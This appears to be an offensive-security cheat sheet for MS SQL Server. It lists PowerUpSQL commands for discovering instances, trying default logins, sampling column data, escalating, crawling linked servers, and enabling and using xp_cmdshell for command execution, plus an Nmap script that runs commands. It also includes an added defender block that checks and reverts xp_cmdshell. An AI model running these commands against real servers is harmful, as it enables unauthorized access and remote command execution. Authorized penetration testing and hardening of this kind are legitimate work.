SQL

PowerUpSQL

https://github.com/NetSPI/PowerUpSQL

Identify SQL instances

Authenticated user

Get-SQLInstanceDomain [| Get-SQLServerInfo]

Unauthenticated user

Get-SQLInstanceScanUDP

Attempt to log in with a domain account

Get-SQLConnectionTestThreaded

Attempt to log in with a default password

Get-SQLServerDefaultLoginPw

List DB, tables, columns

Get-SQLInstanceDomain | Get-SQLDatabase
Get-SQLInstanceDomain | Get-SQLTable -DatabaseName <DB_name>
Get-SQLInstanceDomain | Get-SQLColumn -DatabaseName <DB_name> -TableName <Table_name>

Search column names for a given keyword

Get-SQLInstanceDomain | Get-SQLColumnSampleData -Keywords "<word1,word2>" -Verbose -SampleSize 10

Escalate via MSSQL

Invoke-SQLAudit [-exploit]

RCE

Invoke-SQLOSCmd

Crawling database links

Get-SQLServerLink
Get-SQLServerLinkCrawl
Get-SQLQuery -Instance "<SERVER1>" -Query 'EXEC "<SERVER2>".master..xp_cmdshell "whoami /all"'

Enable XP_CMDSHELL

Type one line at a time.

EXEC sp_configure 'show advanced options', 1;
go
RECONFIGURE;
go
EXEC sp_configure 'xp_cmdshell', 1;
go
RECONFIGURE;
go
xp_cmdshell '<cmd>'
go
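Added defender-side counterpart to the enable sequence above (not part of the original notes): T-SQL to check whether xp_cmdshell is currently on, which principals were explicitly granted EXECUTE on it, whether a proxy account exists, what the error log recorded, and how to revert the setting. It assumes a login with VIEW SERVER STATE / ALTER SETTINGS (or sysadmin); xp_readerrorlog is an undocumented but standard procedure.

```sql
-- Added defender check for the xp_cmdshell setting (not part of the original notes).
-- 1. Current state: value_in_use = 1 means xp_cmdshell is active right now,
--    independent of whether 'show advanced options' is on.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 2. Principals explicitly granted EXECUTE on master..xp_cmdshell
--    (sysadmin members can run it without an explicit grant and are not listed here),
--    plus the proxy account non-sysadmin callers would run under.
USE master;
SELECT pr.name AS grantee, pr.type_desc, dp.permission_name, dp.state_desc
FROM sys.database_permissions AS dp
JOIN sys.database_principals AS pr ON pr.principal_id = dp.grantee_principal_id
JOIN sys.objects AS o ON o.object_id = dp.major_id
WHERE o.name = 'xp_cmdshell';

SELECT name, credential_identity, modify_date
FROM sys.credentials
WHERE name = '##xp_cmdshell_proxy_account##';

-- 3. Recent enable/disable events: every sp_configure change is written to the
--    SQL Server error log as "Configuration option 'xp_cmdshell' changed from 0 to 1".
--    Arguments: log 0 = current log, type 1 = SQL Server log, search string.
EXEC xp_readerrorlog 0, 1, N'xp_cmdshell';

-- 4. Revert to the default (off) and hide advanced options again.
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

Step 3 only covers the current log; pass 1, 2, ... as the first argument to search rotated logs.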

Nmap RCE

nmap -Pn -n --script=ms-sql-xp-cmdshell.nse <victim_ip> -p1433 --script-args mssql.username=<sql_user>,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd="<cmd>"